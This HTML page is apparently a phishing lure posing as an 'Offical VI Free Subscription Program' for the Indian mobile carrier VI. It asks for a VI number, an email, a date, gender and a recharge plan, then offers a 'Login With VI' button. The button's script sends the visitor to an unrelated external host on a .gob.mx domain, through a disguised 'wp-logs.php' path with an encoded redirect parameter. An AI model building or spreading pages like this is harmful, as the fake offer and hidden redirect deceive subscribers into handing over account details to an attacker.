<!DOCTYPE html>
<html lang="en">
<head>
  <style>
  #btn{
    border:2px solid black ;
    border-radius: 2px;
    margin-left:100px;
    color: black;
  }
  .a{
    
    color: black;
    text-decoration: none;
    border:2px solid black;
    border-radius: 4px;
    margin-left: 100px;
  }
  
    body {
      background-color: #34568B;
    }

    #btn {
      margin-left: px;
      margin-top: 20px;
      width: 150px;
      height: 25px;
      display: inline;
    }

    #btn2 {
      margin-left: 92px;
      margin-top: 20px;
      width: 150px;
      height: 25px;
    }
  </style>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title> Offical VI Free Subscription Program</title>
</head>

<body>
  <h2>Offical VI Free Subscription Program</h2>
  <form action="#">
    <label for="name" class="form"><b>VI_Number  :</b></label>
    <input type="text" name="myName" id="name" class="form"><br><br>
    <div>
      <b>User_Name : </b><input type="email" name="myEmail" class="form">
    </div>
    <br>
    <div>
      <b>Date: </b> <input type="date" name="myDate" class="form">
    </div>
    <br>
    <div>
      <b>Apply For VI Free Subscription Program ?</b> <input type="checkbox" class="form" name="myEligibility" checked>
    </div>
    <br>
    <div>
      <b>Gender : </b> Male<input type="radio" name="myGender"> Female <input type="radio" name="myGender">
      Other <input class="form" type="radio" name="myGender">
    </div>
    <br>
    <div>
      <label for="cars"><b>VI_Plan :</b></label>
      <br>
      <select id="cars" name="cars">
        <option value="volvo"><b>₹99 Talktime with 200MB Data Combo Pack</b></option>
        <option value="saab">₹118 12GB Data for 28 Days Pack</option>
        <option value="fiat">₹179 Unlimited Talktime and 2GB Data for 28 Days Pack</option>
        <option value="audi">₹199 Unlimited Talktime and 4GB Data for 28 Days Pack</option>
        
        <option value="audi2">OTHER</option>
      </select>
      <br>
      <br>
    </div>

  </form>
  
  <button id="btn"><b>Login With VI</b></button>

<script>
  // get the button element by its ID
  const btn = document.getElementById("btn");

  // add a click event listener to the button
  btn.addEventListener("click", function() {
    // set the URL to redirect to
    window.location.href = "http://imduyv.gob.mx/~wp-logs.php/?url=Ly9tb2JpbGVfYmx1ZS9pbmRleC5waHA/JmFtcDtpPTA5WlBM";
  });
</script>